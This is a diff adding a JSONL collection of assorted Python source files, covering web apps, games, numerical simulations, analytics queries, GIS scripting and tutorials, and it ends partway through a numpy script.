diff --git "a/290.jsonl" "b/290.jsonl" new file mode 100644--- /dev/null +++ "b/290.jsonl" @@ -0,0 +1,778 @@ +{"seq_id":"645271213","text":"from flask import render_template, flash, redirect, url_for\nfrom fridgetime import app\nfrom fridgetime.forms import RegistrationForm, LoginForm\nfrom fridgetime.models import User, Recipe, Ingredient\n\n\ntestdata = [\n {\n 'user': 'Grant Donoghue',\n 'recipename': 'Omelette',\n 'ingredients': '3 Eggs'\n }\n]\n\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n return render_template('index.html', testdata=testdata)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n form = RegistrationForm() # passed from forms.py\n if form.validate_on_submit():\n flash(f'Account created for {form.username.data}!', 'success')\n return redirect(url_for('index'))\n return render_template('register.html', title='Register', form=form) # passed from form variable\n\n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm()\n if form.validate_on_submit():\n flash(f'You have been logged in!', 'success')\n return redirect(url_for('index'))\n else:\n flash(f'Login unsuccessful. Please check username and password.', 'danger')\n return render_template('login.html', title='Login', form=form)\n","sub_path":"fridgetime/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"427696357","text":"import pygame\nfrom audio import SoundEffects\nfrom graphics import AnimatedSprite\n\n\nclass Player(AnimatedSprite):\n\n def __init__(self, x, y, spritesheet):\n AnimatedSprite.__init__(self, spritesheet)\n self._vertical_speed = 0\n self._horizontal_speed = 0\n self._collidable_stuff = []\n\n self._sounds = SoundEffects()\n\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def set_collidabel_stuff(self, collidable_stuff):\n self._collidable_stuff = collidable_stuff\n\n def update_horizontal_velocity(self, x):\n if self._horizontal_speed + x < 10\\\n or self._horizontal_speed + x > -10:\n self._horizontal_speed += x\n self.should_flip_horizontally = (self._horizontal_speed > 0)\n\n def update(self, t):\n AnimatedSprite.update(self, t)\n self.rect.y += self._vertical_speed\n if self._vertical_speed < 10:\n self._vertical_speed += 1\n collision_list = pygame.sprite.spritecollide(self, self._collidable_stuff, False)\n for collision in collision_list:\n if self._vertical_speed > 0:\n self.rect.bottom = collision.rect.top\n self._vertical_speed = 0\n else:\n self.rect.top = collision.rect.bottom\n self._vertical_speed = 0\n\n self.rect.x += self._horizontal_speed\n collision_list = pygame.sprite.spritecollide(self, self._collidable_stuff, False)\n for collision in collision_list:\n if self._horizontal_speed > 0:\n self.rect.right = collision.rect.left\n self._horizontal_speed = 0\n else:\n self.rect.left = collision.rect.right\n self._horizontal_speed = 0\n\n def jump(self):\n self.rect.y += 2\n platform_hit_list = pygame.sprite.spritecollide(self, self._collidable_stuff, False)\n self.rect.y -= 2\n if len(platform_hit_list) > 0:\n self._vertical_speed = -20\n self._sounds.jump()\n\n","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"116957517","text":"def make_handler_closure():\n # локальная переменная\n sequence = 0\n\n def handler(result):\n # нелокальная переменная (не затеняет переменную из функции\n # make_handler), а следовательно остается между вызовами handler()\n nonlocal sequence\n sequence += 1\n print(str.format('[~] Got {} result: {}', sequence, result))\n\n return handler\n\n\ndef make_handler_generator():\n sequence = 0\n\n while True:\n # получаем результат с внешнего кода и связываем с переменной result\n result = yield\n sequence += 1\n print(str.format('[~] Got {} result: {}', sequence, result))\n\n\ndef main():\n print('-' * 80)\n # получаем объект функцию\n handler_closure = make_handler_closure()\n\n for r in range(1, 10):\n handler_closure(r)\n\n print('-' * 80)\n # создаем объект генератор\n handler_generator = make_handler_generator()\n\n # двигаемся в т��ле функции генератора до первой инструкции yield\n next(handler_generator)\n\n # итерируем объект генератор\n for r in range(1, 10):\n handler_generator.send(r)\n\n print('-' * 80)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"core/builtin_types/callable_types/functions/closure2.py","file_name":"closure2.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"345607409","text":"def is_prime(x):\n if x==1:\n return False\n if x==3 or x==2:\n return True \n if not x % 2:\n return False\n if (not x%6==1) and (not x%6==5):\n return False\n ub = int(x**.5)\n f = 5\n while f <= ub:\n if not x % f:\n return False\n elif not x % (f+2):\n return False\n f += 6\n return True\n\nprimes = []\nfor i in range(100000, 200000): ## list of primes\n if is_prime(i):\n primes.append(i) \n\ndef rep_count(prime, key):\n count = 0\n for i in range(0, 10):\n rep = int(str(prime).replace(key, str(i)))\n if is_prime(rep) and len(str(rep))==len(str(prime)):\n count = count + 1\n return count\n\nfrom collections import Counter\ni = 0\nflag = True\nwhile flag and i < len(primes):\n prime = primes[i]\n cc = Counter([x for x in str(prime)])\n values = [x>1 for x in cc.values()]\n keys = [key for key, value in zip(cc.keys(), values) if value and key<='2']\n for key in keys:\n if(rep_count(prime, key)==8):\n flag=False\n i = i+1\n\n\n\n","sub_path":"python/Q51.py","file_name":"Q51.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"537422930","text":"# -*- mode:python; coding:utf-8 -*-\n\n# Copyright (c) 2020 IBM Corp. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Trestle Assemble Command.\"\"\"\n\nimport argparse\nimport logging\nfrom pathlib import Path\nfrom typing import Type, TypeVar\n\nfrom ilcli import Command # type: ignore\n\nfrom trestle.core import const\nfrom trestle.core.models.actions import CreatePathAction, WriteFileAction\nfrom trestle.core.models.elements import Element\nfrom trestle.core.models.file_content_type import FileContentType\nfrom trestle.core.models.plans import Plan\nfrom trestle.oscal import assessment_plan\nfrom trestle.oscal import assessment_results\nfrom trestle.oscal import catalog\nfrom trestle.oscal import component\nfrom trestle.oscal import poam\nfrom trestle.oscal import profile\nfrom trestle.oscal import ssp\nfrom trestle.oscal import target\nfrom trestle.utils import fs\nfrom trestle.utils import log\nfrom trestle.utils.load_distributed import load_distributed\n\nlogger = logging.getLogger(__name__)\n\nTLO = TypeVar(\n 'TLO',\n assessment_plan.AssessmentPlan,\n assessment_results.AssessmentResults,\n catalog.Catalog,\n component.ComponentDefinition,\n poam.PlanOfActionAndMilestones,\n profile.Profile,\n ssp.SystemSecurityPlan,\n target.TargetDefinition\n)\n\n\nclass CatalogCmd(Command):\n \"\"\"Assemble a catalog.\"\"\"\n\n name = 'catalog'\n\n def _run(self, args: argparse.Namespace) -> int:\n \"\"\"Assemble a catalog.\"\"\"\n logger.info(f'Assembling catalog titled: {args.name}')\n return AssembleCmd.assemble_model(self.name, catalog.Catalog, args)\n\n\nclass ProfileCmd(Command):\n \"\"\"Assemble a profile.\"\"\"\n\n name = 'profile'\n\n def _run(self, args: argparse.Namespace) -> int:\n logger.info(f'Assembling profile titled: {args.name}')\n return AssembleCmd.assemble_model(self.name, profile.Profile, args)\n\n\nclass TargetDefinitionCmd(Command):\n \"\"\"Assemble a target definition.\"\"\"\n\n name = 'target-definition'\n\n def _run(self, args: argparse.Namespace) -> int:\n return AssembleCmd.assemble_model(self.name, target.TargetDefinition, args)\n\n\nclass ComponentDefinitionCmd(Command):\n \"\"\"Assemble a component definition.\"\"\"\n\n name = 'component-definition'\n\n def _run(self, args: argparse.Namespace) -> int:\n return AssembleCmd.assemble_model(self.name, component.ComponentDefinition, args)\n\n\nclass SystemSecurityPlanCmd(Command):\n \"\"\"Assemble a system security plan.\"\"\"\n\n name = 'system-security-plan'\n\n def _run(self, args: argparse.Namespace) -> int:\n return AssembleCmd.assemble_model(self.name, ssp.SystemSecurityPlan, args)\n\n\nclass AssessmentPlanCmd(Command):\n \"\"\"Assemble a assessment plan.\"\"\"\n\n name = 'assessment-plan'\n\n def _run(self, args: argparse.Namespace) -> int:\n return AssembleCmd.assemble_model(self.name, assessment_plan.AssessmentPlan, args)\n\n\nclass AssessmentResultCmd(Command):\n \"\"\"Assemble a assessment result.\"\"\"\n\n name = 'assessment-results'\n\n def _run(self, args: argparse.Namespace) -> int:\n return AssembleCmd.assemble_model(self.name, assessment_results.AssessmentResults, args)\n\n\nclass PlanOfActionAndMilestonesCmd(Command):\n \"\"\"Assemble a plan of action and milestones.\"\"\"\n\n name = 'plan-of-action-and-milestones'\n\n def _run(self, args: argparse.Namespace) -> int:\n return AssembleCmd.assemble_model(self.name, poam.PlanOfActionAndMilestones, args)\n\n\nclass AssembleCmd(Command):\n \"\"\"Assemble all subcomponents from a specified trestle model into a single JSON/YAML file under dist.\"\"\"\n\n name = 'assemble'\n\n subcommands = [\n CatalogCmd,\n ProfileCmd,\n TargetDefinitionCmd,\n ComponentDefinitionCmd,\n SystemSecurityPlanCmd,\n AssessmentPlanCmd,\n AssessmentResultCmd,\n PlanOfActionAndMilestonesCmd\n ]\n\n def _init_arguments(self) -> None:\n self.add_argument('-n', '--name', help='Name of the model to assemble.', required=True)\n self.add_argument(\n '-x', '--extension', help='Type of file output.', choices=['json', 'yaml', 'yml'], default='json'\n )\n\n @classmethod\n def assemble_model(cls, model_alias: str, object_type: Type[TLO], args: argparse.Namespace) -> int:\n \"\"\"Assemble a top level OSCAL model within the trestle dist directory.\"\"\"\n log.set_log_level_from_args(args)\n trestle_root = fs.get_trestle_project_root(Path.cwd())\n if not trestle_root:\n logger.error(f'Current working directory {Path.cwd()} is not with a trestle project.')\n return 1\n if not trestle_root == Path.cwd():\n logger.error(f'Current working directory {Path.cwd()} is not the top level trestle project directory.')\n return 1\n\n # contruct path to the model file name\n root_model_dir = Path.cwd() / f'{model_alias}s'\n try:\n model_file_type = fs.get_contextual_file_type(root_model_dir / args.name)\n except Exception as e:\n logger.error('No files found in the specified model directory.')\n logger.debug(e)\n return 1\n\n model_file_name = f'{model_alias}{FileContentType.to_file_extension(model_file_type)}'\n root_model_filepath = root_model_dir / args.name / model_file_name\n\n if not root_model_filepath.exists():\n logger.error(f'No top level model file at {root_model_dir}')\n return 1\n\n # distributed load\n _, _, assembled_model = load_distributed(root_model_filepath)\n assembled_model_filepath = trestle_root / const.TRESTLE_DIST_DIR / f'{model_alias}.{args.extension}'\n\n plan = Plan()\n plan.add_action(CreatePathAction(assembled_model_filepath, True))\n plan.add_action(\n WriteFileAction(\n assembled_model_filepath,\n Element(assembled_model),\n FileContentType.to_content_type(f'.{args.extension}')\n )\n )\n\n try:\n plan.simulate()\n plan.execute()\n return 0\n except Exception as e:\n logger.error('Unknown error executing trestle create operations. Rolling back.')\n logger.debug(e)\n return 1\n","sub_path":"trestle/core/commands/assemble.py","file_name":"assemble.py","file_ext":"py","file_size_in_byte":6736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"171816112","text":"def TOH(n, a, b, c):\r\n if n == 1:\r\n print('move 1st disk from ', a, \"to \", c)\r\n return\r\n TOH(n - 1, a, c, b)\r\n print('move ', n, 'th disk from ', a, ' to', c)\r\n TOH(n - 1, b, a, c)\r\n\r\n\r\nn = int(input())\r\nTOH(n, 'a', 'b', 'c')\r\n","sub_path":"2. Recursion2/6. tower of hanoi.py","file_name":"6. tower of hanoi.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"638814293","text":"from pylab import *\nimport mpl_toolkits.mplot3d.axes3d as p3\n\n\nNx = 25 \nNy = 25 \nradius = 0.35\nNiter = 1500 \nerrors = np.zeros(Niter)\n\n\nx = np.linspace(-0.5,0.5,25) \ny = np.linspace(0.5,-0.5,25) \nX,Y = meshgrid(x,y) \nphi = np.zeros((Nx,Ny)) \nii = where(X*X + Y*Y <= radius*radius) \nphi[ii] = 1.0 \n\ncontour(X,Y,phi)\nplot(x[ii[0]],y[ii[1]],'ro')\ngrid()\ntitle('Contour plot of initial potential')\nxlabel('x')\nylabel('y')\nshow()\n\nnewphi = np.zeros((Nx,Ny)) \nfor k in range(Niter):\n oldphi = phi.copy() \n newphi[1:-1,1:-1] = 0.25*(phi[1:-1,0:-2] + phi[1:-1,2:] + phi[0:-2,1:-1] + phi[2:,1:-1]) \n \n newphi[1:-1,0] = newphi[1:-1,1] \n newphi[1:-1,Nx-1] = newphi[1:-1,Nx-2]\n newphi[0,1:-1] = newphi[1,1:-1]\n newphi[ii] = 1.0\n \n errors[k] = max(np.absolute(np.subtract(oldphi.flatten(),newphi.flatten()))) \n phi = newphi.copy() \n\n\n\nxError = np.linspace(1,Niter,1500) \nyError = np.log(errors) \nA=np.zeros((Niter,2)) \nA[:,0] = 1\nA[:,1] = xError\nconst = lstsq(A,yError)[0] \nyError = const[0] + const[1]*xError \nyError = np.exp(yError)\n\nsemilogy(xError,errors)\nshow()\n\nloglog(np.arange(1,1501,50),errors[0::50],'ro')\nloglog(xError,errors)\nshow()\n\nxError2 = np.linspace(501,Niter,1000)\nyError2 = np.log(errors[500:])\nB=np.zeros((Niter-500,2))\nB[:,0] = 1\nB[:,1] = xError2\nconst = lstsq(B,yError2)[0]\nyError2 = const[0] + const[1]*xError2\nyError2 = np.exp(yError2)\n\n\nsemilogy(np.arange(1,1501,50),errors[0::50],'ro')\nplot(xError,yError)\nplot(xError2, yError2)\ngrid()\ntitle('Error plot')\nxlabel('No. of iterations')\nylabel('Error')\nlegend(('Calculated Error','Fit 1 (all iterations)','Fit 2 (>500 iterations)'))\nshow()\n\n\n\n\nfig1 = figure(4)\nax = p3.Axes3D(fig1)\ntitle('The 3-D surface plot of the potential')\nax.set_xlabel('x')\nax.set_ylabel('y')\nax.set_zlabel('Potential $(\\phi)$')\nsurf = ax.plot_surface(X, Y, phi, rstride=1, cstride=1, cmap=cm.jet,linewidth=0, antialiased=False)\nshow()\n\n\ncontour(x,y,phi)\nplot(x[ii[0]],y[ii[1]],'ro')\nxlabel('x')\nylabel('y')\ntitle('Contour plot of final potential')\ngrid()\nshow()\n\n\n\nJx = np.zeros((Nx,Ny))\nJy = np.zeros((Nx,Ny))\n\nJy[1:-1,1:-1] = 0.5*(phi[1:-1,2:] - phi[1:-1,0:-2])\nJx[1:-1,1:-1] = 0.5*(phi[2:,1:-1] - phi[0:-2,1:-1])\n\n\n\n\nplot(x[ii[0]],y[ii[1]],'ro')\nxlabel('x')\nylabel('y')\ntitle('Vector plot of the current flow')\nquiver(y,x,Jy[::-1,:],Jx[::-1,:])\ncontour(x,y,phi)\nshow()\n\n","sub_path":"Assign_5/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"518588118","text":"\n\nfrom xai.brain.wordbase.adjectives._fast import _FAST\n\n#calss header\nclass _FASTED(_FAST, ):\n\tdef __init__(self,): \n\t\t_FAST.__init__(self)\n\t\tself.name = \"FASTED\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"fast\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_fasted.py","file_name":"_fasted.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"486401492","text":"# -*- coding: utf-8 -*-\n\nimport datetime\nfrom collections import OrderedDict\n\nimport peewee\n\nfrom ..pageview.models import PageView, UserAgent\nfrom ..db import database\n\n\nclass AnalyticsQuery(object):\n\n @staticmethod\n def all_views():\n return PageView.select()\n\n @staticmethod\n def views_in_interval(beginning, end):\n assert isinstance(beginning, datetime.datetime)\n assert isinstance(end, datetime.datetime)\n return PageView.select().where(end >= PageView.timestamp >= beginning)\n\n @classmethod\n def grouped_by(cls, group_by_duration, views):\n groups = {\n 'month': cls.monthly_views,\n 'week': cls.weekly_views,\n 'day': cls.daily_views\n }\n assert (group_by_duration in groups.keys())\n return groups[group_by_duration](views)\n\n @staticmethod\n def views_count(views):\n return views.count()\n\n @staticmethod\n def daily_views(views):\n query = (\n views.select(PageView.timestamp, peewee.fn.Count(PageView.id))\n .group_by(database.truncate_date('day', PageView.timestamp))\n .order_by(PageView.timestamp.year, PageView.timestamp.month,\n PageView.timestamp.day)\n .tuples())\n return OrderedDict([(obj.date().strftime('%Y-%m-%d'), count) for (obj,count) in query])\n\n @staticmethod\n def monthly_views(views):\n query = (\n views.select(PageView.timestamp, peewee.fn.Count(PageView.id))\n .group_by(database.truncate_date('month', PageView.timestamp))\n .order_by(PageView.timestamp.year, PageView.timestamp.month)\n .tuples())\n return OrderedDict([(obj.date().strftime('%B-%Y'), count) for (obj,count) in query])\n\n @staticmethod\n def weekly_views(views):\n query = (\n views.select(PageView.timestamp, peewee.fn.Count(PageView.id))\n .group_by(PageView.timestamp.year,\n peewee.fn.strftime('%W', PageView.timestamp))\n .order_by(PageView.timestamp.year, PageView.timestamp.month)\n .tuples())\n return OrderedDict([(obj.date().strftime('%Y-%m-%d'), count) for (obj,count) in query])\n\n @staticmethod\n def total_ips(views):\n return views.select(PageView.ip).group_by(PageView.ip).count()\n\n @staticmethod\n def top_n_pages(views, n):\n query = (views.select(PageView.url, peewee.fn.Count(PageView.id))\n .group_by(PageView.url)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())[:n]\n return [{'url': url, 'hits': hits} for (url, hits) in query]\n\n @staticmethod\n def top_n_countries(views, n):\n query = (views.select(PageView.country, peewee.fn.Count(PageView.id))\n .where(PageView.country!=None)\n .group_by(PageView.country)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())[:n]\n return [{'country': country, 'hits': hits} for (country, hits) in query]\n\n @staticmethod\n def top_n_browsers(views, n):\n query = (views.select(UserAgent.browser, peewee.fn.Count(PageView.id))\n .where(UserAgent.browser!=None)\n .join(UserAgent, peewee.JOIN.LEFT_OUTER)\n .group_by(UserAgent.browser)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())[:n]\n return [{'browser': browser, 'hits': hits} for (browser, hits) in query]\n\n @staticmethod\n def top_n_os(views, n):\n query = (views.select(UserAgent.os, peewee.fn.Count(PageView.id))\n .where(UserAgent.os!=None)\n .join(UserAgent, peewee.JOIN.LEFT_OUTER)\n .group_by(UserAgent.os)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())[:n]\n return [{'os': os, 'hits': hits} for (os, hits) in query]\n\n @staticmethod\n def all_pages(views):\n query = (views.select(PageView.url, peewee.fn.Count(PageView.id))\n .group_by(PageView.url)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())\n return [{'url': url, 'hits': hits} for (url, hits) in query]\n\n @staticmethod\n def all_countries(views):\n query = (views.select(PageView.country, peewee.fn.Count(PageView.id))\n .where(PageView.country!=None)\n .group_by(PageView.country)\n .order_by(peewee.fn.Count(PageView.id).desc())\n .tuples())\n return [{'country': country, 'hits': hits} for (country, hits) in query]\n","sub_path":"webby/dashboard/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"520921050","text":"from collections import deque\nimport time\nfrom datetime import datetime\n\nprint(\"\\n1er exemple simple d'utilisation d'une deque pour gérer une queue circulaire\\n\")\n\ncircQueue = deque(maxlen=4)\ns = ''\n\nwhile True:\n if s.upper() == 'Q':\n break\n currTime = datetime.utcnow().strftime('%H:%M:%S')\n circQueue.append(currTime)\n print(circQueue) \n s = input('q to quit: ')\n\nprint(\"\\n2ème exemple: la deque contient des entiers dont on calcule la moyenne mobile\\n\")\n\ncircQueue = deque(maxlen=4)\ns = ''\ni = 0\n\nwhile True:\n if s.upper() == 'Q':\n break\n circQueue.append(i)\n i += 1\n print(circQueue, end=' ')\n print('sum:' , end=' ')\n print(sum(circQueue), end=' ')\n print('moving avg:' , end=' ')\n print(sum(circQueue) / 4)\n s = input('q to quit: ')\n\nprint(\"\\n3ème exemple plus proche des besoin de C2. Ici, on ajoute à la deque des paires\")\nprint(\"de valeurs (volume et prix) que l'on place en couple dans une liste. On calcule\")\nprint(\"la moyenne mobile du prix pondéré par le volume\\n\")\n\ncircQueue = deque(maxlen=4)\ns = ''\nvolume = 1\nprice = 100\n\nwhile True:\n if s.upper() == 'Q':\n break\n circQueue.append([volume, price])\n volume += 1\n price += 10\n \n print(circQueue, end=' ')\n \n movingVolume = sum(x[0] for x in circQueue)\n print('mVol:' , end=' ')\n print(movingVolume, end=' ')\n \n movingTotal = sum(x[0] * x[1] for x in circQueue)\n print('mPrVolTot:' , end=' ')\n print(movingTotal, end=' ')\n\n movingAvg = movingTotal / movingVolume\n print('mPrAvg:' , end=' ')\n print('{:3.2f}'.format(movingAvg))\n\n s = input('q to quit: ')","sub_path":"circular_queue_deque.py","file_name":"circular_queue_deque.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"294124154","text":"# %matplotlib inline\nimport numpy as np #для работы с массивами - их по умолчанию в Python нет\nimport scipy\nfrom scipy import linalg\n#1\na = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9], [0, -1, 12]], float) #создание матрицы\nprint(a.shape) #размерность матрицы\nb = np.array([[1, 2, 3]], float) #создание вектора\n\nb = a * 2 #умножение на число - умножается каждый элемент\nprint(b)\n\nc = a + 1 #добавление числа - добавляется к каждоме элементу\nprint(c)\nd = c + b #сложение матриц - складываеются матрица при каждом ее члене\nd = np.add(b, c)\t\t\t #тоже самое через функцию в NP\n\nd = b - c \t\t\t #вычитание матриц - вычитание матрица при каждом ее члене\nd = np.subtract(b, c) #тоже самое через функцию в NP\nprint(d)\n\nf = d.transpose() #транспонирование\nd.T\nprint(f)\n\ng = np.dot(f, d) #умножение матриц\nprint(g)\n\ne = np.identity(3) #создание единичной матрицы порядка 3\nprint(e)\n\np = np.linalg.inv(g) #создание обратной матиццы\nprint(p)\n\naa = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])\nnp.linalg.det(aa) #определитель\nnp.linalg.matrix_rank(b, 0.0001) #ранк матрицы\n\n#2 СЛАУ\nprint('##########')\nA = np.array([[3, 2], [3, -4]])\nB = np.array([4, 1])\nnp.linalg.solve(A, B) # решение СЛАУ\n\nP, L, U = linalg.lu(A) # LU разложение СЛА\nprint(P, L, U)\n\nA = np.array([[1, 2, -1], [3, -4, 0], [8,-5, 2], [2,0, -5], [11, 4, -7]])\nB = np.array([1, 7, 12, 7, 15])\nX, q, rank, p = np.linalg.lstsq(A, B) # решение по метода наименьшиъ квадраов\n\n#!!! Не проверенно\nL = scipy.linalg.choletsky(A) #разложение Хлецкого - для симметричных матриц\nQ, R = np.linalg.qr(A) #QR разложение\nnp.concatenate(A, B) # склеивание матриц\n","sub_path":"operation_08_matrix.py","file_name":"operation_08_matrix.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528917027","text":"#-----------------------------------------\n# import\n#-----------------------------------------\nimport os\nimport sys\nfrom keras.layers import Input, Conv2D, Conv2DTranspose, Add, Activation, MaxPooling2D, Dropout, UpSampling2D\nfrom keras.models import Model\nfrom keras.initializers import Constant\nfrom keras.regularizers import l2\nfrom .layers import BilinearUpSampling2D, bilinear_upsample_weights\nfrom .encorders import build_vgg16\n\n\n#-----------------------------------------\n# defines\n#-----------------------------------------\nCUR_PATH = os.path.join(os.path.dirname(__file__))\n\n#-----------------------------------------\n# functions\n#-----------------------------------------\n\n\ndef build(classes=21, input_shape=(224, 224, 3), weights_path=None, weight_decay=0., drop_rate=None, bilinear=False):\n\n # Build Base Encorder\n encorder = build_vgg16(input_shape, weights_path,\n weight_decay, drop_rate)\n\n encorder_input = encorder.inputs[0]\n # for skip connection\n p4 = encorder.get_layer(name='block4_pool').output\n p7 = encorder.outputs[0]\n\n '''\n Skip Connection\n '''\n # dimention reduction\n p4 = Conv2D(classes, 1, activation='relu', name='conv_p4',\n kernel_regularizer=l2(weight_decay),\n kernel_initializer='he_normal')(p4)\n p7 = Conv2D(classes, 1, activation='relu', name='conv_p7',\n kernel_regularizer=l2(weight_decay),\n kernel_initializer='he_normal')(p7)\n\n # upsampling x2\n u4 = Conv2DTranspose(classes, 4, activation='relu',\n strides=2, padding='same', name='upscore_p4',\n kernel_regularizer=l2(weight_decay),\n #kernel_initializer=Constant(bilinear_upsample_weights(2, classes)),\n kernel_initializer='he_normal')(p4)\n\n # upsampling x4\n u7 = Conv2DTranspose(classes, 8, activation='relu',\n strides=4, padding='same', name='upscore_p7',\n kernel_regularizer=l2(weight_decay),\n #kernel_initializer=Constant(bilinear_upsample_weights(4, classes)),\n kernel_initializer='he_normal')(p7)\n\n # fuse skip layers\n x = Add(name='add')([u4, u7])\n\n # upsampling x8\n if bilinear:\n x = BilinearUpSampling2D((8, 8))(x)\n else:\n x = Conv2DTranspose(classes, 16, activation='relu',\n strides=8, padding='same', name='upscore_final',\n kernel_regularizer=l2(weight_decay),\n #kernel_initializer=Constant(bilinear_upsample_weights(8, classes)),\n kernel_initializer='he_normal')(x)\n\n x = Activation('softmax', name='softmax')(x)\n\n model = Model(encorder_input, x)\n\n return model\n","sub_path":"models/vgg_fcn16s.py","file_name":"vgg_fcn16s.py","file_ext":"py","file_size_in_byte":2833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"405252921","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/report')\ndef report():\n minuscula = False\n mayuscula = False\n numero = False\n first = request.args.get('first')\n\n minuscula = any(c.islower() for c in first) # alguna min\n mayuscula = any(c.isupper() for c in first) # alguna mayusc\n numero = first[-1].isdigit() # numero al final\n\n report = minuscula and mayuscula and numero\n\n return render_template('report.html', report=report, min=minuscula, may=mayuscula, num=numero)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flask_exercise/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"375986390","text":"if __name__ == '__main__':\n import pandas as pd\n import os\n from datetime import datetime\n\n from settings import Settings\n from dropbox_sync_uploader import Uploader\n\n settings = Settings(settings_file=os.path.join(os.path.dirname(__file__), 'settings.yml'))\n timestamp = datetime.now().strftime(settings.dropbox_sync.timestamp_format)\n logfile = settings.dropbox_sync.log.file_path\n \n uploader = Uploader(settings)\n\n try:\n df = pd.read_csv(logfile)\n for _, row in df.iterrows():\n remote_file_path = '/backups/{}{}'.format(timestamp, row['filepath'])\n if row['event'] != 'DELETED':\n uploader.upload(row['filepath'], remote_file_path)\n else:\n uploader.delete(remote_file_path)\n except Exception:\n pass\n","sub_path":"dropbox_sync_sender.py","file_name":"dropbox_sync_sender.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"293669622","text":"import arcpy, os, sys\n\narcpy.env.workspace, inWorkspace = arcpy.GetParameterAsText(0)\noutWorkspace = arcpy.GetParameterAsText(1)\n\n# set paths to ones specified by user\nrootPath=inWorkspace\noutPath = outWorkspace\n# folders under root\ndataPath = rootPath + \"\\\\Data\"\npopPath = rootPath + \"\\\\Pop_data_districts\"\n#output path\noutput = \"\\\\output\"\n\n# define lstfiles\nlstfiles = arcpy.ListFiles(\"*.xls\")\nsheet = \"Tab Wbl \"\n\nfor xlsfile in lstfiles:\n\tfor num in range(1,24):\n\t\ttmp = \"\"\n\t\tif num < 10:\n\t\t\ttmp += \"0\" + str(num)\n\t\telse: \n\t\t\ttmp += str(num)\n\t\ttry:\n\t\t\tarcpy.TableToTable_conversion(xlsfile + \"\\\\\" + sheet + tmp + \"$\", outPath, \"test\" + tmp + \".dbf\")\n\t\texcept RuntimeError as i:\n\t\t\tcontinue\n\n# lets merge them all together!\narcpy.env.workspace += output\ntableList = arcpy.ListTables()\narcpy.Merge_management(tableList, \"all.dbf\")\narcpy.AddMessage(\"success\")\n","sub_path":"tools/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"531277231","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nsin1 = np.zeros((50,100))\nsin2 = np.zeros((50,100))\nsin3 = np.zeros((50,100))\nsin4 = np.zeros((50,100))\n\nfor i in range(50):\n for j in range(100):\n \n sin1[i,j] = np.cos((i - 25.)*np.pi/50.) * np.cos((j - 12.5)*np.pi/25.)\n sin2[i,j] = np.cos((i - 25.)*np.pi/50.) * np.cos((j - (12.5 + 25.))*np.pi/25.)\n sin3[i,j] = np.cos((i - 25.)*np.pi/50.) * np.cos((j - (12.5 + 50.))*np.pi/25.)\n sin4[i,j] = np.cos((i - 25.)*np.pi/50.) * np.cos((j - (12.5 + 75.))*np.pi/25.)\n\nsin1[:,25:100] = 0. \nsin2[:,:25] = 0.\nsin2[:,50:] = 0.\nsin3[:,:50] 